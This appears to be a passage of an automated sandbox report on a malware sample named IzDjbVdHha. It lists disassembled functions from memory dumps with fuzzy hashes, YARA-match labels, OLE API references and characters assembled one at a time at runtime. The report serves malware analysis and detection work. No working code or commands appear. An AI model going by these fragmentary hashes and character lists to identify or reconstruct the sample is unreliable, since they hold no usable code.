Opcode Fuzzy Hash: bd0ee31e4d4d6d9ac2fa2587f77cf37721911ca3e59ccc36e7bfb755614f87b6
Instruction Fuzzy Hash: 2C1166324092905AC314CB289940737BBE19B87310F584A5DF4D6E32E1D728CC028B8A

Function 009FC17B Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f9a145d1016b4b0f711bdeb502ec5b34ea66807830c0b234bdd3adf214441fd
Instruction ID: c3ecab7caa38177adf8f9e81f66a79ea982e092507b1159c5f2a7f8d869d5ebe
Opcode Fuzzy Hash: 4f9a145d1016b4b0f711bdeb502ec5b34ea66807830c0b234bdd3adf214441fd
Instruction Fuzzy Hash: 0211567650D2A45BC324CB289A4073ABBE19B97710F688E5CF6D6E72D2D724CD068742

Function 009F4ACD Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a1d6dc959a99ffce52465f3ced87fece6d02db5f489f15dd164950e6412c6f
Instruction ID: 8c535a12d352592005659afbc3fb18d377938176d31b28f30f2853d8b23c9b49
Opcode Fuzzy Hash: 57a1d6dc959a99ffce52465f3ced87fece6d02db5f489f15dd164950e6412c6f
Instruction Fuzzy Hash: C5215CB76446509FC3144F48D8814BBB3B2EB91318F2A453CE99957311C735ED05EBD5

Function 00A1887B Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a164414c649293df32a122712d6e0e106fe21d8b546922be5564c9c7b9508f0
Instruction ID: 005e49583372aa03a6004b11fb8318cc7fc7847933c6188485e1821770293672
Opcode Fuzzy Hash: 4a164414c649293df32a122712d6e0e106fe21d8b546922be5564c9c7b9508f0
Instruction Fuzzy Hash: C20164386082019BE310AF68D985ABBB3E6EBC2300F18D438E28493196DB34CC829756

Function 00435450 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 1bdb52c757136d0f491bb15e4131204bafb517a34a554dccf387603b88e59a22
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 4D11EC336055D40EC3198D3C84006657FD31AB7235F6953DAF4B89B2D3D5268DCA8359

Function 00A156B7 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: d7fd8516074cffe81224749ad70e170084ea254a1a82fc43593abbb201e17f9f
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 6311C233E055D08EC3168E3C88105A5BFE30AE3274B6D8799E4B89B2D2D6238DCA8755

Function 0042A700 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
Instruction ID: 3de76f9d274b52e90d2ef9e87ec8d3366dafd7d2e10265ff4f1f4711345407d1
Opcode Fuzzy Hash: b077483ebbe41559666eb24632921f170fd341de44e0cb4593afb61e9b0962fb
Instruction Fuzzy Hash: 7601B1F570171147D720AE51A9C0B27B2B86FC0748F19443EEC4457342DB7DEC29869E

Function 00A0A967 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a6bce38bb77cb855b0c1b2651f63ca23977da10de64c19d828eeec774b109c
Instruction ID: 75fdcd2f993d6c45dcead03ac21d90667da65df0786a8e8822aea28faf0bdd35
Opcode Fuzzy Hash: e4a6bce38bb77cb855b0c1b2651f63ca23977da10de64c19d828eeec774b109c
Instruction Fuzzy Hash: 7001D4F170074547DF219F95A4C1B3BB7A86FA0784F19442CEA595B381EF72EC05C2A2

Function 00428D93 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95

Function 0043CA93 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8

Function 00423086 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D

Function 00A032ED Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
Instruction ID: 09faffafe0d0b2ffda80600f51b2f3968002f8b49de7f6497f622e984d0c8579
Opcode Fuzzy Hash: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
Instruction Fuzzy Hash: 88E0E579C91100AFDF007B11ED02A5C7AB3AB62303B461535E408A7271EF325AAAEB59

Function 00427AD3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E

Function 0041C653 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E

Function 009FC8BA Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
Instruction ID: b74fb98e1be63e5207e8958d710069c450bc33a035efa1edc33ddfaf156cbfec
Opcode Fuzzy Hash: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
Instruction Fuzzy Hash: 8DD0127BF821004B9A099F11DD43B766A6397C770470CE1348905D3348EE3DD41AC00E

Function 0040BFFD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C

Function 009EC264 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C

Function 00A09AB5 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
Instruction ID: ce026412afbe2e925953561583b7fd5053a181c1e8b983188d4ab8564e106f11
Opcode Fuzzy Hash: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
Instruction Fuzzy Hash: 73B012E0C04540C7DC009F605C01832A23C4607210F003820D10CE7202E531D400810D

Function 0042984F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E

Function 00A1898E Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
Instruction ID: 5f90c8482877ae364e78efe8602c82ba5110085f469652caa7ae2d3bb2038f17
Opcode Fuzzy Hash: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
Instruction Fuzzy Hash: AC900224D4D1008681508F449440470E279930B111F103410900CF3062C310D545455D

Function 00431715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043179A

Strings

/, xrefs: 00431867
;, xrefs: 00431817
n, xrefs: 004318D1
^, xrefs: 0043185D
O, xrefs: 0043187B
0, xrefs: 00431980
J, xrefs: 00431885
m, xrefs: 004318B7
], xrefs: 00431849
0, xrefs: 0043182B
, xrefs: 0043183F
G, xrefs: 004318A3
~, xrefs: 004318C1
#, xrefs: 00431899
{, xrefs: 004318E1
H, xrefs: 004318AD
Q, xrefs: 00431853
B, xrefs: 00431871
4, xrefs: 00431821
B, xrefs: 0043188F

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767

Function 00A1197C Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00A11A01

Strings

0, xrefs: 00A11A92
B, xrefs: 00A11AD8
O, xrefs: 00A11AE2
m, xrefs: 00A11B1E
0, xrefs: 00A11BE7
, xrefs: 00A11AA6
], xrefs: 00A11AB0
~, xrefs: 00A11B28
Q, xrefs: 00A11ABA
#, xrefs: 00A11B00
^, xrefs: 00A11AC4
G, xrefs: 00A11B0A
H, xrefs: 00A11B14
;, xrefs: 00A11A7E
4, xrefs: 00A11A88
{, xrefs: 00A11B48
B, xrefs: 00A11AF6
n, xrefs: 00A11B38
/, xrefs: 00A11ACE
J, xrefs: 00A11AEC

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction ID: 5400d9781311e46cac68b4d8559ec6e864949c0c2eedc7e4bd710aaac029d782
Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction Fuzzy Hash: 8A81076010CBC28AD322C63C881875FBFD15BE7224F188B9DE1F58B3E6D6A58146C767

Function 004312D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00431360

Strings

#, xrefs: 0043145F
J, xrefs: 0043144B
n, xrefs: 00431497
4, xrefs: 004313E7
^, xrefs: 00431423
B, xrefs: 00431437
{, xrefs: 004314A7
O, xrefs: 00431441
/, xrefs: 0043142D
G, xrefs: 00431469
;, xrefs: 004313DD
, xrefs: 00431405
m, xrefs: 0043147D
], xrefs: 0043140F
0, xrefs: 0043153F
0, xrefs: 004313F1
B, xrefs: 00431455
~, xrefs: 00431487
Q, xrefs: 00431419
H, xrefs: 00431473

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727

Function 00A11538 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00A115C7

Strings

m, xrefs: 00A116E4
/, xrefs: 00A11694
0, xrefs: 00A11658
4, xrefs: 00A1164E
{, xrefs: 00A1170E
^, xrefs: 00A1168A
B, xrefs: 00A116BC
H, xrefs: 00A116DA
, xrefs: 00A1166C
], xrefs: 00A11676
O, xrefs: 00A116A8
~, xrefs: 00A116EE
Q, xrefs: 00A11680
B, xrefs: 00A1169E
J, xrefs: 00A116B2
#, xrefs: 00A116C6
G, xrefs: 00A116D0
n, xrefs: 00A116FE
0, xrefs: 00A117A6
;, xrefs: 00A11644

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: 6f22a0880c23a9bbb7a33d0e483182c1760f74e3511f7230aa79bdd364a30959
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: EF81F62010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727

Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042E9F6
VariantInit.OLEAUT32 ref: 0042EA05

Strings

:, xrefs: 0042EA48
-, xrefs: 0042EA94
>, xrefs: 0042EA58
0, xrefs: 0042EA60
4, xrefs: 0042EA70
8, xrefs: 0042EA40
Q, xrefs: 0042EA2C
W, xrefs: 0042EA34
<, xrefs: 0042EA50
b, xrefs: 0042EA3C
,, xrefs: 0042EA90
2, xrefs: 0042EA68
6, xrefs: 0042EA78
*, xrefs: 0042EA88
., xrefs: 0042EA98
T, xrefs: 0042EA24
(, xrefs: 0042EA80

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6

Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F83F
VariantInit.OLEAUT32 ref: 0042F84E

Strings

:, xrefs: 0042F897
0, xrefs: 0042F8AF
*, xrefs: 0042F8D7
4, xrefs: 0042F8BF
<, xrefs: 0042F89F
b, xrefs: 0042F88B
8, xrefs: 0042F88F
T, xrefs: 0042F873
Q, xrefs: 0042F87B
(, xrefs: 0042F8CF
,, xrefs: 0042F8DF
-, xrefs: 0042F8E3
W, xrefs: 0042F883
>, xrefs: 0042F8A7
6, xrefs: 0042F8C7
., xrefs: 0042F8E7
2, xrefs: 0042F8B7

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66

Function 00A0FA9A Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00A0FAA6
VariantInit.OLEAUT32 ref: 00A0FAB5

Strings

,, xrefs: 00A0FB46
6, xrefs: 00A0FB2E
b, xrefs: 00A0FAF2
8, xrefs: 00A0FAF6
4, xrefs: 00A0FB26
., xrefs: 00A0FB4E
W, xrefs: 00A0FAEA
T, xrefs: 00A0FADA
:, xrefs: 00A0FAFE
0, xrefs: 00A0FB16
-, xrefs: 00A0FB4A
Q, xrefs: 00A0FAE2
(, xrefs: 00A0FB36
<, xrefs: 00A0FB06
*, xrefs: 00A0FB3E
2, xrefs: 00A0FB1E
>, xrefs: 00A0FB0E

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 2ce07210b265b1d47b98f925a6ed1c12bb1fcc2916065d46ae3da5e4b326dd3f
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: E841E720108BC1CED726CF3C9498616BFA16B66224F088ADDD8E54F3DBC375D51ACB66

Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043244F

Strings

X, xrefs: 0043246D
H, xrefs: 004324D1
A, xrefs: 004324EA
J, xrefs: 0043248B
E, xrefs: 00432495
e, xrefs: 004324B3
L, xrefs: 004324BD
[, xrefs: 004324DB
@, xrefs: 004324E5
[, xrefs: 004324C7
Q, xrefs: 0043249F
@, xrefs: 004324A9
C, xrefs: 00432481
X, xrefs: 00432477

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757

Function 00A12670 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00A126B6

Strings

X, xrefs: 00A126DE
A, xrefs: 00A12751
X, xrefs: 00A126D4
[, xrefs: 00A12742
Q, xrefs: 00A12706
J, xrefs: 00A126F2
H, xrefs: 00A12738
C, xrefs: 00A126E8
[, xrefs: 00A1272E
e, xrefs: 00A1271A
L, xrefs: 00A12724
E, xrefs: 00A126FC
@, xrefs: 00A12710
@, xrefs: 00A1274C

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
